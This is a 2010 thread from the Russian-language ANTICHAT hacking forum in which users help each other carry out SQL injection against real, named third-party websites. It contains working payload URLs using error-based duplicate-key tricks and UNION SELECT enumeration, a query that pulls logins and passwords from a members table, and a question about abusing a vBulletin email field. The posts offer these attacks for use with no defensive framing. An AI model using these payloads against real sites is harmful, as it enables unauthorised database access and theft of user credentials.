ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
23.07.2010, 03:27
|
|
Новичок
Регистрация: 29.04.2010
Сообщений: 19
Провел на форуме:
58603
Репутация:
3
|
|
[Feldmarschall], ты крут
Хотя и пришлось чуть-чуть подправить(не сам код)... но это то что нужно! (метод с Duplicate ложу в копилку)
2 Dare, остался только этот бажный))
Всем спасибо!
SQL ERROR: Duplicate entry '5.1.48-log1' for key 'group_key'
SQL: SELECT * FROM tbl WHERE `GID` IN (0) AND `OID` IN (134) or (select count(*) from information_schema.tables group by concat(version(),floor(rand(0)*2)))-- )
|
|
|
23.07.2010, 19:19
|
|
Новичок
Регистрация: 12.03.2010
Сообщений: 7
Провел на форуме:
38329
Репутация:
0
|
|
Я не могу получить правильное число столбцов и инфицированных колонке для получения данных
http://games.cartoonnetworkhq.com/playGame.php?gameID=-229%20union%20all%20select%201,@@version,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
|
|
|
|
23.07.2010, 21:37
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
linuxkernal, там двойной запрос. Раскручивать можно только, как слепую инъекцию, тоесть через "and ..."
|
|
|
|
23.07.2010, 21:55
|
|
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013
Репутация:
453
|
|
linuxkernal
А если почитать эту тему чуть выше, то можно найти решение
Код:
Code:
http://games.cartoonnetworkhq.com/playGame.php?gameID=133 and+1=(select+count(*)+from+information_schema.tables+group+by+concat(version(),floor(rand(0)*2))+limit+1)/*
|
|
|
|
25.07.2010, 14:52
|
|
Познающий
Регистрация: 17.04.2009
Сообщений: 59
Провел на форуме:
401944
Репутация:
37
|
|
delete
|
|
|
|
26.07.2010, 11:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
2597
Репутация:
0
|
|
почему не показать table_name?
http://www.indiajournal.com/info/event.php?id=3041'+and+1=0+union+select+1,table_na me,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36%20 from%20information_schema.tables%20where%20table_s chema=database() limit 1,1--+
|
|
|
|
26.07.2010, 11:32
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
Сообщение от happygirl
happygirl said:
почему не показать table_name?
http://www.indiajournal.com/info/event.php?id=3041'+and+1=0+union+select+1,table_na me,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36%20 from%20information_schema.tables%20where%20table_s chema=database() limit 1,1--+
http://www.indiajournal.com/info/event.php?id=3041%27+and+1=2+UnIoN+sElEct+1,tAble_ NamE,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,%2021,22,23,24,25,26,27,28,29,30,31,32,33,34,35, 36%20%20from%20information_schema.tables%20where%2 0table_schema=database%28%29%20limit%201,1+--+%27
|
|
|
|
26.07.2010, 15:00
|
|
Новичок
Регистрация: 29.04.2010
Сообщений: 19
Провел на форуме:
58603
Репутация:
3
|
|
SQL ругается на "-" в имени базы
Всем привет.
Впервые столкнулся с такой проблемой... при запросе:
Код:
Code:
http://site.com/view/id/1+union+select+1,2,3,concat_ws(':',login,pass),5+from+my-schema.members+limit+0,1--.html
выдает ошибку:
Код:
Code:
Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-schema.members limit 0,1--' at line 10
Убрать имя базы из запроса нельзя (хотя мот и есть какие хитрости) - выдает ошибку.
Как же разобраться с этой "-" в запросе?
------------------------------------------------------------
Вопрос решен добавлением "`"
|
|
|
|
26.07.2010, 15:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
6647
Репутация:
0
|
|
в вэбулитен существует возможность при регистрации в email писать все что угодно . как можно это использовать?
|
|
|
|
26.07.2010, 16:12
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
Сообщение от None
в вэбулитен существует возможность при регистрации в email писать все что угодно . как можно это использовать?
А что можно выжать из этого? Все равно для реги нужно подтверждения по мылу.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
